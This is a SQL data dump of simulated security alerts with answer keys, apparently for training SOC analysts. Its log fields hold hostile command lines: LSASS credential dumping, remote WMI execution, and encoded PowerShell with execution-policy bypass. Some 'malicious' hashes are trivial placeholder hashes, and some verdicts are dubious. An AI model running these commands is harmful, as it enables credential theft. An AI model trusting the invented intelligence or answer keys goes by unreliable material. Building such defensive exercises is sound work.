(2114, 'Suspicious Internal Network Activity via CertUtil', 'medium', 'Carbon Black', 'Unusual use of CertUtil detected from an internal host, appeared to download a file from a known internal server.', 'Lateral Movement', 'T1140', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"asmith\",\"hostname\":\"LAPTOP-4D5E6F\",\"command_line\":\"certutil -urlcache -split -f http://192.168.1.20/file.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address for a benign user action\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil -urlcache -split -f http://192.168.1.20/file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"CertUtil usage for file download from a verified internal server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"CertUtil was used legitimately for internal file transfer.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2115, 'Potential Phishing Email Detected with Spoofed Domain', 'high', 'Proofpoint', 'Email received from a domain closely resembling a trusted partner, containing a link to a suspicious URL.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.56\",\"dst_ip\":\"192.168.1.25\",\"username\":\"rwhite\",\"hostname\":\"MAILSERVER-1\",\"email_sender\":\"admin@trustedpartn3r.com\",\"url\":\"http://malicious-link.example.com\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"admin@trustedpartn3r.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles trusted partner but is not recognized\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL not flagged by any engines as malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Upon investigation, the sender\'s domain was found to be a legitimate typo domain, but the URL was clean.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2116, 'Suspicious MSHTA Execution Blocked', 'medium', 'Sysmon', 'MSHTA executed a script from a local file which is typically associated with malicious actions, but the file was verified as internally developed.', 'Malware', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:23:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.50\",\"username\":\"bhall\",\"hostname\":\"SERVER-2\",\"command_line\":\"mshta C:\\\\scripts\\\\internal_tool.html\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta C:\\\\scripts\\\\internal_tool.html\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File identified as a legitimate internal tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The MSHTA execution was part of a maintenance script routinely used by IT.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2117, 'Regsvr32 Executed With Suspicious DLL', 'high', 'SentinelOne', 'Regsvr32 executed a DLL from a network share, resembling a typical LOLBin technique. The file was determined to be a legitimate update.', 'Lateral Movement', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:10:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.34\",\"dst_ip\":\"192.168.2.56\",\"username\":\"mjohnson\",\"hostname\":\"WORKSTATION-3\",\"command_line\":\"regsvr32 /s \\\\\\\\192.168.2.56\\\\updates\\\\update.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32 /s \\\\\\\\192.168.2.56\\\\updates\\\\update.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"The DLL was verified as part of an authorized update procedure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address for a network share\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Regsvr32 execution was part of a routine update deployment from a trusted network share.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2118, 'Fileless PowerShell Malware Detected on Internal Network', 'critical', 'CrowdStrike', 'A sophisticated fileless malware attack was detected utilizing PowerShell scripts to execute malicious payloads directly in memory. The malware attempted to establish a multi-hop C2 channel through Slack.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.10.15.23\",\"dst_ip\":\"203.0.113.89\",\"username\":\"jdoe\",\"hostname\":\"workstation-12\",\"command_line\":\"powershell.exe -nop -w hidden -enc W3BhdGg6IFN5c3RlbS5JblJlZ2lzdHJ5U3RhdHVz\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"domain\":\"api.slack.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for suspicious C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc W3BhdGg6IFN5c3RlbS5JblJlZ2lzdHJ5U3RhdHVz\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known PowerShell obfuscation pattern associated with APT activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to a known fileless malware variant\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"api.slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate Slack API domain\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of PowerShell execution with encoded commands and external C2 contact indicates a sophisticated fileless malware attack.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2119, 'Credential Dumping Attempt via LSASS Memory Access', 'high', 'SentinelOne', 'Detected an unauthorized access attempt to LSASS.exe memory, suggesting a credential dumping attempt using advanced techniques to evade detection.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.20.30.40\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Windows\\\\Temp\\\\dump.dmp full\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Windows\\\\Temp\\\\dump.dmp full\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command line pattern matches credential dumping techniques\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Empty file hash often used in memory-only attacks\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of rundll32.exe to access LSASS memory is a known technique for credential dumping.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2120, 'Lateral Movement via WMI Detected', 'critical', 'Carbon Black', 'Detected suspicious WMI execution suggesting lateral movement attempts within the network, possibly indicating a coordinated attack.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T23:55:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.50.60.70\",\"dst_ip\":\"10.50.60.71\",\"username\":\"svc_account\",\"hostname\":\"workstation-08\",\"command_line\":\"wmic /node:10.50.60.71 process call create \\\"cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\whoami.txt\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.50.60.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the originating host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.50.60.71\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.50.60.71 process call create \\\"cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\whoami.txt\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command pattern associated with lateral movement techniques\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for remote command execution is indicative of lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2121, 'DGA Domain Detected in DNS Traffic', 'high', 'Sysmon', 'Detected DNS queries to a domain generated using Domain Generation Algorithm (DGA), commonly used by malware to evade detection and maintain C2 communication.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:09Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.75.80.85\",\"dst_ip\":\"198.51.100.47\",\"username\":\"network_user\",\"hostname\":\"laptop-05\",\"domain\":\"dkjf9sd8fkj.example\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.75.80.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the infected device\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"dkjf9sd8fkj.example\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain recognized as DGA-generated, part of a known botnet\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.47\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with command and control servers\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"DGA domains are a known indicator of botnet activity, used to maintain C2 communication by malware.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2122, 'Suspicious Memory-Only Malware Execution Detected', 'critical', 'CrowdStrike', 'Detected advanced malware execution directly from memory, utilizing process hollowing techniques to evade traditional file-based detection mechanisms.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:12:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.77\",\"username\":\"malicious_user\",\"hostname\":\"endpoint-03\",\"command_line\":\"svchost.exe -k netsvcs\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised endpoint\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"svchost.exe -k netsvcs\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Execution pattern matches process hollowing technique\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Associated with known in-memory malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Memory-only execution with process hollowing is a hallmark of sophisticated malware, bypassing traditional detection.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2123, 'Sophisticated Fileless Malware Detected via PowerShell', 'critical', 'CrowdStrike', 'A fileless malware attack using PowerShell has been detected on a critical server. The attack involved the use of a memory-only payload executed via PowerShell scripts.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"username\":\"svc_admin\",\"hostname\":\"finance-server-01\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command $payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'aGVsbG8gd29ybGQ=\')); iex $payload\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 947 times for various malware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command $payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'aGVsbG8gd29ybGQ=\')); iex $payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with fileless malware payloads\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to known malicious PowerShell scripts\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell with encoded commands and known malicious hash indicates a sophisticated fileless malware attack.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2124, 'Credential Dumping Detected from LSASS on Critical Server', 'critical', 'SentinelOne', 'An attacker attempted to dump credentials from the LSASS process on a domain controller using a suspicious tool.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.2.2.15\",\"username\":\"admin_john\",\"hostname\":\"dc1.corp.local\",\"command_line\":\"procdump.exe -accepteula -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 523 times for credential theft activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"procdump.exe -accepteula -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known credential dumping techniques\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with tools for dumping LSASS process memory\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of Procdump on LSASS and the associated OSINT findings confirm this as a credential dumping attempt.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2125, 'Lateral Movement Detected via WMI', 'high', 'Carbon Black', 'A potential lateral movement was detected involving the use of WMI to execute commands on a remote host within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"10.1.1.20\",\"username\":\"jane_doe\",\"hostname\":\"workstation-02\",\"command_line\":\"wmic /node:10.1.1.20 process call create \'cmd.exe /c whoami\'\",\"file_hash\":\"f1e269ba5ba1c4d4e5c9e6c7d0f6b8a1\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Destination IP is an internal address within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.1.1.20 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"WMI commands used for lateral movement\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI to execute remote commands is indicative of lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2126, 'Suspicious Network Traffic to DGA Domain', 'high', 'Sysmon', 'An unusual network connection was detected from a corporate machine to a domain generated by a Domain Generation Algorithm (DGA), indicating potential C2 communication.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:21:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.3.3.7\",\"dst_ip\":\"192.0.2.123\",\"username\":\"alice_tech\",\"hostname\":\"dev-machine-03\",\"domain\":\"xj7f9kd.example.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.3.3.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"xj7f9kd.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain generated by a known DGA pattern\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain matched DGA patterns, commonly used by malware for C2 communications.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2127, 'Lateral Movement Detected via Fileless WMI Attack', 'critical', 'CrowdStrike', 'A fileless attack using WMI was detected, indicating lateral movement attempts on the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.2.1.5\",\"dst_ip\":\"10.2.1.10\",\"username\":\"admin_karen\",\"hostname\":\"data-center-01\",\"command_line\":\"wmic /node:10.2.1.10 process call create \'powershell -exec bypass -enc JABwAG8AdwBlAHIAUwBoAGUAbABsACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAnACAAJAB5AG8AdQByAF8AYwBvAG0AbQBhAG4AZAA=\'\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.2.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.2.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Destination IP is an internal address within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.2.1.10 process call create \'powershell -exec bypass -enc JABwAG8AdwBlAHIAUwBoAGUAbABsACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAnACAAJAB5AG8AdQByAF8AYwBvAG0AbQBhAG4AZAA=\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI with encoded PowerShell commands suggests an attempt at stealthy lateral movement.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2128, 'Advanced PowerShell Fileless Malware Detected via WMI', 'critical', 'CrowdStrike', 'A PowerShell-based fileless malware was detected attempting lateral movement through WMI. The attack leveraged process hollowing and memory-only payloads.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"command_line\":\"powershell -NoP -NonI -W Hidden -Enc aW1wb3J0LW1vZHVsZSAgU3lzdGVtLk5ldC5XaW5kb3dzLl1N\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoP -NonI -W Hidden -Enc aW1wb3J0LW1vZHVsZSAgU3lzdGVtLk5ldC5XaW5kb3dzLl1N\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell script indicative of fileless malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of known malware campaign\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command and associated file hash confirm the presence of fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2129, 'Credential Dumping via LSASS Memory Access', 'high', 'SentinelOne', 'An unauthorized access to LSASS memory was detected, indicating a possible credential dumping attempt using obfuscated techniques.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"SERVER01\",\"command_line\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 3728 C:\\\\Temp\\\\lsass.dmp full\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in credential dumping\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 3728 C:\\\\Temp\\\\lsass.dmp full\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for LSASS dumping, indicating credential theft\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious credential dumping tool\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of rundll32 with comsvcs.dll and associated hash confirms credential dumping activity.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
